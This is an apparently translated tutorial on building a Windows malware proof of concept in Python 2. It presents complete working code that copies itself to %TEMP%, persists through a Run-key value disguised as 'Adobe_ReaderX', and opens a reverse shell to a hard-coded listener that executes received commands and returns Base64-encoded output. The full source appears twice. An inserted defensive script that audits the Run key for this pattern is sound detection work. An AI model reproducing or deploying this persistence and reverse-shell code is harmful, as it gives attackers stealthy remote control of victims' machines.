Technology sharing: Building a malware PoC with Python and PyInstaller
Disclaimer: This article is intended for knowledge sharing and must never be used maliciously!
This article shows how to use Python and PyInstaller to build a proof of concept (PoC) of malware.
As is well known, malware usually needs to persist on the target. There are many ways to achieve this on Windows; the most common is to add a value under the registry key "Software\Microsoft\Windows\CurrentVersion\Run". The following Python code copies the program to the %TEMP% directory and then modifies the registry so that the program is executed whenever a user logs on to the computer.
The code is Python 2 (it uses the _winreg module, which Python 3 calls winreg):

import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy the executable to %TEMP% (cmd expands the variable):
    os.system('copy %s %s' % (fileName, tempdir))

    # Query the Windows registry for the values under the Run key
    # and store their names in the runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:   # EnumValue raises once the last value has been read
        pass

    # Set the autorun value if it is not already present.
    # Writing under HKLM needs administrative rights; a failure is swallowed silently.
    # The value points at %TEMP%\mw.exe, so the built executable must be named mw.exe.
    if 'Adobe_ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass
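Added example, not part of the original article: a defender-side audit of the HKLM Run key that flags values matching the persistence pattern just shown (an image under %TEMP%, an unexpanded environment variable in the path, a vendor-style name such as Adobe_ReaderX launching from outside Program Files or Windows). The winreg enumeration only works on Windows; the classifier is pure Python and is exercised on a constructed entry list elsewhere. The heuristics, thresholds and sample entries are my own assumptions, not from the page.

```python
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
# Installers do not place a persistent launcher in a temp directory; the PoC
# above writes %TEMP%\mw.exe, so any Run value pointing here deserves a look.
TEMP_MARKERS = ("%temp%", "%tmp%", r"\appdata\local\temp", r"\windows\temp")
# The PoC mimics a vendor name ("Adobe_ReaderX"); genuine vendor entries launch from Program Files or Windows.
VENDOR_HINTS = ("adobe", "microsoft", "google", "intel")   # assumed heuristic list
TRUSTED_ROOTS = (r"c:\program files", r"c:\windows")

def image_path(command):
    """Executable part of a Run-key command line: quoted path or first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]

def classify_run_entry(name, command):
    """Reasons this Run value matches the PoC's persistence pattern; [] if clean."""
    path = image_path(command).lower()
    reasons = []
    if any(marker in path for marker in TEMP_MARKERS):
        reasons.append("launches from a temp directory")
    if path.startswith("%"):
        reasons.append("unexpanded environment variable in path")
    if any(v in name.lower() for v in VENDOR_HINTS) and not path.startswith(TRUSTED_ROOTS):
        reasons.append("vendor-style name but image outside Program Files/Windows")
    return reasons

def audit_run_entries(entries):
    """Flagged value names mapped to their reasons; entries are (name, command) pairs."""
    return {n: classify_run_entry(n, c) for n, c in entries if classify_run_entry(n, c)}

def read_run_entries():
    """Enumerate the live HKLM Run key (Windows only) as (name, command) pairs."""
    import winreg  # Python 3 name of the _winreg module the PoC uses
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        return [winreg.EnumValue(key, i)[:2] for i in range(winreg.QueryInfoKey(key)[1])]

# Constructed sample of what the enumeration returns on a host carrying the PoC.
SAMPLE_ENTRIES = [
    ("SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Adobe_ReaderX", r"%TEMP%\mw.exe"),
]

if __name__ == "__main__":
    entries = read_run_entries() if sys.platform == "win32" else SAMPLE_ENTRIES
    for name, reasons in audit_run_entries(entries).items():
        print("FLAGGED %s: %s" % (name, "; ".join(reasons)))
```

On a Windows host the script reads the real key; elsewhere it runs against the constructed sample, which flags only the Adobe_ReaderX entry.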
After we have copied the program to the %TEMP% directory and set up persistence, we can execute the next part of the code, the reverse shell. Here I used the Python reverse shell published by TrustedSec, but made one change: Base64 encoding of the network traffic.

def shell():
    # Base64-encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))   # hard-coded listener address
    s.send('[*] Connection Established!')   # this banner is sent unencoded
    while 1:
        data = s.recv(1024)
        if data == "quit":
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)   # command output is Base64-encoded before sending
        s.send(encoded)
        # s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()
Now, when this program is executed, it opens a reverse shell back to the "attacker". In this case the "attacker" is just a hard-coded IP address in the script, but pointing it at a domain name or a cloud-hosted machine would be equally simple. When the program is run on a Windows host it connects back to the attacker's listener; note that the network traffic is Base64-encoded.
The complete code is as follows:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy the executable to %TEMP%:
    os.system('copy %s %s' % (fileName, tempdir))

    # Query the Windows registry for the values under the Run key
    # and store their names in the runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass

    # If the autorun value "Adobe_ReaderX" isn't set, this will set it:
    if 'Adobe_ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass

def shell():
    # Base64-encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit":
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        # s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()